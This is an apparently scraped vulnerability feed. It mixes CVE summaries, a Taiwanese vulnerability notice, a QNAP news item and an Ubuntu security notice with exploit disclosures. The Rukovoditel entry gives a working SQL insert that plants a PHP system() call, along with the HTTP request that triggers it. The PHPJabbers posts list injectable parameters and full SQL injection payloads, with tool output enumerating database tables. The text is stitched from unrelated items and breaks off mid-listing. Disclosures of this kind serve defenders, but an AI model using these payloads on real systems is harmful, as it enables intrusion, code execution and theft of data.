In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, an authenticated attacker could read arbitrary local file by connecting a rogue mysql server, By adding allowLoadLocalInfile to true in the jdbc parameter. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-44644

Efence login function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify or delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202301001

CVE ID

CVE-2023-22900

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

思考軟體科技 Efence 1.2.58 DB.ver 28

問題描述

Efence之登入功能未對使用者輸入的參數進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

思考軟體科技 Efence 1.2.58 DB.ver 29 (Aug. 2022)

漏洞通報者

Kun Xian Lin (DEVCORE)

公開日期

2023-01-31

CVE-2023-22900: 思考軟體科技 Efence - SQL Injection

Taiwanese company QNAP has released updates to remediate a critical security flaw affecting its network-attached storage (NAS) devices that could lead to arbitrary code injection.
Tracked as CVE-2022-27596, the vulnerability is rated 9.8 out of a maximum of 10 on the CVSS scoring scale. It affects QTS 5.0.1 and QuTS hero h5.0.1.
"If exploited, this vulnerability allows remote attackers to inject

Data Security / Vulnerability

Taiwanese company QNAP has released updates to remediate a critical security flaw affecting its network-attached storage (NAS) devices that could lead to arbitrary code injection.

Tracked as **CVE-2022-27596**, the vulnerability is rated 9.8 out of a maximum of 10 on the CVSS scoring scale. It affects QTS 5.0.1 and QuTS hero h5.0.1.

"If exploited, this vulnerability allows remote attackers to inject malicious code," QNAP said in an advisory released Monday.

The exact technical specifics surrounding the flaw are unclear, but the NIST National Vulnerability Database (NVD) has categorized it as an SQL injection vulnerability.

This means an attacker could send specially crafted SQL queries such that they could be weaponized to bypass security controls and access or alter valuable information.

"Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack," according to MITRE.

The vulnerability has been addressed in versions QTS 5.0.1.2234 build 20221201 and later, as well as QuTS hero h5.0.1.2248 build 20221215 and later.

Zero-day vulnerabilities in exposed QNAP appliances have been put to use by DeadBolt ransomware actors to breach target networks, making it essential to update to the latest version in order to mitigate potential threats.

To apply the updates, users are advised to log in to QTS or QuTS hero as an administrator, navigate to Control Panel > System > Firmware Update, and select "Check for Update" under the "Live Update" section.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

QNAP Fixes Critical Vulnerability in NAS Devices with Latest Security Updates

Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.

**Rukovoditel v3.2.1 has Remote Code Execution in ajax\_request.php**

Author: y1s3m0

vendors:

*   https://www.rukovoditel.net/
    
*   https://sourceforge.net/projects/rukovoditel/files/latest/download
    

**Payload**

database:rukovoditel

In the latest version of Rukovoditel, there is a remote command execution vulnerability that can be exploited simply by combining it with an SQL injection vulnerability. By executing the following command in the database, you can store the command you need. You just need to focus on "id", "type", and "configuration", and make sure that type="fieldtype\_ajax\_request" and configuration are the PHP command you want to execute.

INSERT INTO \`rukovoditel\`.\`app\_fields\`(\`id\`, \`entities\_id\`, \`forms\_tabs\_id\`, \`comments\_forms\_tabs\_id\`, \`forms\_rows\_position\`, \`type\`, \`name\`, \`short\_name\`, \`is\_heading\`, \`tooltip\`, \`tooltip\_display\_as\`, \`tooltip\_in\_item\_page\`, \`tooltip\_item\_page\`, \`notes\`, \`is\_required\`, \`required\_message\`, \`configuration\`, \`sort\_order\`, \`listing\_status\`, \`listing\_sort\_order\`, \`comments\_status\`, \`comments\_sort\_order\`) VALUES (999, 23, 28, 0, '', 'fieldtype\_ajax\_request', 'Subject', '', 1, '', '', 0, '', '', 1, '', '{\\"php\_code\\":\\"system(\\\\"whoami\\\\")\\"}', 3, 1, 3, 0, 0);

Then, by obtaining the administrator's "form\_session\_token" and cookie, you can construct a payload similar to the one below and execute the command stored in the database. Make sure that field\_id is the injected id above.

POST /index.php?module\=dashboard/ajax\_request&field\_id\=999 HTTP/1.1
Host: rukovoditel:8082
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Content-Length: 35
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: cookie\_test=please\_accept\_for\_session; sid=ecvuqrogd8e5v7jvlqr2mvhj5c; app\_remember\_me=1; app\_stay\_logged=1; app\_remember\_user=YWRtaW4%3D; app\_remember\_pass=JFAkRTRVRnlFMHhGQzYxMlFqWE5KUHJxLzJHck9oUGVTMA%3D%3D; XDEBUG\_SESSION=XDEBUG\_ECLIPSE
DNT: 1
Origin: http://rukovoditel:8082
Referer: http://rukovoditel:8082/index.php?module=custom\_php/code
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
form\_session\_token=ih7agGdyZZ

CVE-2022-48175: vulnfind/rce_ajax_request.md at main · y1s3m0/vulnfind

PHPJabbers Car Park Booking System version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'index' is vulnerable to XSS/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS][-] Done

PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

Ubuntu Security Notice 5823-3 - USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced a regression in MySQL Router preventing connections from PyMySQL. This update reverts most of the changes in MySQL Router to 8.0.31 until a proper fix can be found.

==========================================================================  
Ubuntu Security Notice USN-5823-3  
January 29, 2023

mysql-5.7, mysql-8.0 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

USN 5823-1 introduced a regression in MySQL.

Software Description:  
- mysql-8.0: MySQL database

Details:

USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced  
a regression in MySQL Router preventing connections from PyMySQL. This  
update reverts most of the changes in MySQL Router to 8.0.31 until a proper  
fix can be found.

We apologize for the inconvenience.

Original advisory details:

  Multiple security issues were discovered in MySQL and this update includes  
  new upstream MySQL versions to fix these issues.  
   MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and  
  Ubuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41.  
   In addition to security fixes, the updated packages contain bug fixes, new  
  features, and possibly incompatible changes.  
   Please see the following for more information:  
   https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
  https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.html  
  https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.10.2

Ubuntu 22.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.04.2

Ubuntu 20.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5823-3  
   https://ubuntu.com/security/notices/USN-5823-1  
   https://launchpad.net/bugs/2003835

Package Information:  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.10.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.04.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5823-3

PHPJabbers Event Ticketing System Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Event Ticketing System Script 1.0                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.php/preview.php?lid=[XSS]GET parameter 'lid' is vulnerable to XSS[-] Done

PHPJabbers Event Ticketing System Script 1.0 Cross Site Scripting

PHPJabbers Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Travel Tours Script 1.0                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /front.phpfront.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=[SQLI]&rating_to=[SQLI]GET parameter 'rating_from' is vulnerable to SQLI---Parameter: rating_from (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND 3442=3442 AND (7236=7236&rating_to=5    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9974=9974,1))),0x71626b7871),9974) AND (8540=8540&rating_to=5    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND (SELECT 2396 FROM (SELECT(SLEEP(5)))lmil) AND (1063=1063&rating_to=5---GET parameter 'rating_to' is vulnerable to SQLI---Parameter: rating_to (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND 3784=3784 AND (4445=4445    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9427=9427,1))),0x71626b7871),9427) AND (7794=7794    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND (SELECT 9220 FROM (SELECT(SLEEP(5)))QqcU) AND (6313=6313---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[52 tables]+------------------------------------------+| vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_listings                || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale_languages || vacationpackages_plugin_locale           || vacationpackages_plugin_log_config       || vacationpackages_plugin_log              || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   || vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings                || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale           || vacationpackages_plugin_locale_languages || vacationpackages_plugin_log              || vacationpackages_plugin_log_config       || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   |+------------------------------------------+[-] Done

PHPJabbers Travel Tours Script 1.0 SQL Injection

PHPJabbers Travel Tours Script version 1.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : PHPJabbers.com                                                             │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Travel Tours Script 1.0                                         │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /front.php

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&price_from=[XSS]&price_to=[XSS]&rating_from=[XSS]&rating_to=[XSS]

/front.php?controller=pjListings&action=pjActionRegister&view=[XSS]&direction=[XSS]&listing_search=[XSS]

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&pjPage=[XSS]

GET parameter 'listing_search' is vulnerable to XSS

GET parameter 'view' is vulnerable to XSS

GET parameter 'season' is vulnerable to XSS

GET parameter 'direction' is vulnerable to XSS

GET parameter 'price_from' is vulnerable to XSS

GET parameter 'price_to' is vulnerable to XSS

GET parameter 'pjPage' is vulnerable to XSS

GET parameter 'rating_from' is vulnerable to XSS

GET parameter 'rating_to' is vulnerable to XSS

URL parameter to XSS

/front.php/[XSS]?controller=pjListings&action=pjActionRegister&view=[XSS]t&direction=[XSS]&listing_search=[XSS]

[-] Done

PHPJabbers Travel Tours Script 1.0 Cross Site Scripting

PHPJabbers Property Listing Script version 3.1 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Property Listing Script 3.1                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: preview.php/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33GET parameter 'feature_id' is vulnerable to SQLI---Parameter: feature_id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bedrooms' is vulnerable to SQLI---Parameter: min_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bedrooms' is vulnerable to SQLI---Parameter: max_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bathrooms' is vulnerable to SQLI---Parameter: min_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bathrooms' is vulnerable to SQLI---Parameter: max_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[66 tables]+------------------------------------------+| property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale           || property_listing_plugin_locale_languages || 